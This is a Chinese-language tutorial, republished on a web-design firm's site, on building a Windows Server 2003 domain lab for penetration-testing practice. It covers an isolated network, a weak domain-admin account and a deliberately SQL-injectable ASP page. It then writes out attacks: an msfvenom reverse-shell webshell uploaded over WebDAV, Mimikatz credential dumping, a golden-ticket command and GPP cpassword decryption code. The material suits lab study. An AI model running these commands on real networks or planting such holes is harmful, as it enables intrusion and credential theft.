尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

Windows Server 2003渗透测试靶机环境构建与实战

Windows Server 2003渗透测试靶机环境构建与实战 1. 为什么选择Windows Server 2003作为渗透测试靶机在网络安全领域Windows Server 2003系统至今仍是渗透测试教学中的经典环境。这个2003年发布的服务器操作系统之所以成为活化石主要源于三个不可替代的特性首先其内核架构与现代Windows系统存在显著差异。NT 5.2内核缺乏ASLR地址空间随机化、DEP数据执行保护等现代防护机制内存管理方式也更为简单。这种裸奔状态使其成为演示基础漏洞原理的理想标本比如经典的缓冲区溢出攻击在Win2003上可以呈现出最直观的攻击链。其次Active Directory域服务在该版本达到成熟阶段。相比NT4的初级实现和Win2000的不稳定2003的域控制器提供了完整的组策略、信任关系等企业级功能却又不具备后续版本中的Kerberos强化、PAC验证等安全改进。这使得它成为演练域渗透技术的黄金版本从经典的Pass-the-Hash到黄金票据攻击都能清晰展现攻击路径。最后系统自带的IIS 6.0和旧版SQL Server等组件存在大量已公开漏洞。例如WebDAV的缓冲区溢出CVE-2017-7269、Printer后台处理程序RCEMS10-061等这些在后续版本中修补的漏洞在2003环境中可以原汁原味地复现。安全研究员HD Moore曾统计未打补丁的Win2003平均存在12个可远程利用的高危漏洞。实战提示建议使用SP2英文原版镜像SHA1: 8F8D72F4F2870DC7499CDE7B3BE46Fc5AABE1B3E中文版可能在某些漏洞利用时出现兼容性问题。虚拟机配置推荐2核CPU、2GB内存、40GB磁盘网络模式选择Host-only确保隔离。2. 域控制器靶机环境构建详解2.1 系统安装与基础加固从微软官方渠道获取Windows Server 2003 R2 ISO后在VMware Workstation 16中新建虚拟机时需特别注意BIOS设置中关闭CPU的NX位支持对应vmx配置文件添加cpuid.7.ebx:xxx 0000:0000:0000:0000:0000:0000:0000:0000磁盘控制器选择IDE模式SCSI驱动可能导致蓝屏安装过程中按F6加载额外的存储驱动时直接跳过即可系统安装完成后首要任务是进行最小化安全加固通过gpedit.msc禁用自动播放功能计算机配置→管理模板→系统→关闭自动播放→启用所有驱动器配置Windows防火墙基础规则netsh firewall set opmode enable netsh firewall add portopening TCP 3389 Remote Desktop禁用危险的系统服务sc config TlntSvr start disabled sc config W3SVC start demand # 按需启动IIS2.2 Active Directory域服务部署通过dcpromo命令提升为域控制器时会遇到两个典型问题及解决方案问题1DNS服务器配置失败现象安装过程中提示DNS注册失败解决方案先手动安装DNS服务控制面板→添加删除程序→添加Windows组件 创建正向查找区域时选择主要区域和允许非安全更新问题2SYSVOL共享异常现象客户端无法应用组策略事件ID为13508修复步骤net stop ntfrs rd /s /q %systemroot%\sysvol\domain ntfrsutl ds myserver.domain.com net start ntfrs域功能级别建议设置为Windows 2000纯模式这样既支持所有经典攻击手法又能兼容后续加入的Windows XP/7客户端。创建测试用户时务必设置弱密码例如net user hacker Pssw0rd /add /domain net group Domain Admins hacker /add3. 渗透测试环境关键组件配置3.1 漏洞服务部署指南IIS 6.0漏洞环境搭建安装Web服务扩展%windir%\system32\sysocmgr /i:%windir%\inf\sysoc.inf /u:C:\iis6_install.txt其中安装脚本内容包含[Components] iis_common on iis_www on配置WebDAV漏洞演示站点cscript %systemdrive%\inetpub\adminscripts\adsutil.vbs CREATE W3SVC/1/Root/WebDAV IIsWebVirtualDir cscript adsutil.vbs SET W3SVC/1/Root/WebDAV/AccessScript True旧版SQL Server注入环境建议安装SQL Server 2000 SP4配置混合认证模式后创建存在注入点的ASP页面% Set conn Server.CreateObject(ADODB.Connection) conn.Open ProviderSQLOLEDB;Data Source(local);Initial Catalogmaster;User IDsa;Password123456; sql SELECT * FROM users WHERE id Request(id) Set rs conn.Execute(sql) %3.2 网络拓扑与访问控制推荐采用三层网络架构模拟真实企业环境DMZ区192.168.1.0/24放置IIS、SQL服务器内网区10.10.10.0/24域控制器、文件服务器管理区172.16.1.0/24跳板机、Kali攻击机通过路由和远程访问服务配置NAT规则netsh routing ip nat install netsh routing ip nat add interface 内网 private netsh routing ip nat add interface 外网 public重要安全警告实验环境中务必禁用LLMNR和NetBIOS避免产生广播风暴reg add HKLM\Software\Policies\Microsoft\Windows NT\DNSClient /v EnableMulticast /t REG_DWORD /d 0 sc config lmhosts start disabled4. 典型攻击手法实战验证4.1 域渗透黄金链条复现Step 1获取初始立足点利用WebDAV漏洞上传webshellmsfvenom -p windows/meterpreter/reverse_tcp LHOST172.16.1.100 LPORT4444 -f asp shell.asp curl -T shell.asp http://192.168.1.10/WebDAV/Step 2横向移动到域控制器通过Mimikatz提取内存凭据privilege::debug sekurlsa::logonpasswords sekurlsa::tickets /exportStep 3制作黄金票据使用krbtgt哈希伪造TGTkerberos::golden /user:Administrator /domain:TESTLAB.LOCAL /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:a9b30e5b0dc865eadcea9411e4ade7d6 /ptt4.2 组策略首选项漏洞利用查找域控制器共享的Groups.xml文件dir \\dc01\SYSVOL\testlab.local\Policies\*.xml /s解密获取的cpasswordfrom Crypto.Cipher import AES from base64 import b64decode key b\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b cipher AES.new(key, AES.MODE_CBC, b\x00*16) print(cipher.decrypt(b64decode(CCF0jlZ8ZndLdhOaJCrXUA)).decode(utf-16))在真实攻防演练中这套环境可以完整重现超过80%的域渗透技术要点。建议配合Wireshark抓包分析Kerberos认证流程使用Process Monitor监控LSASS进程行为从而深入理解每步攻击背后的原理。
返回列表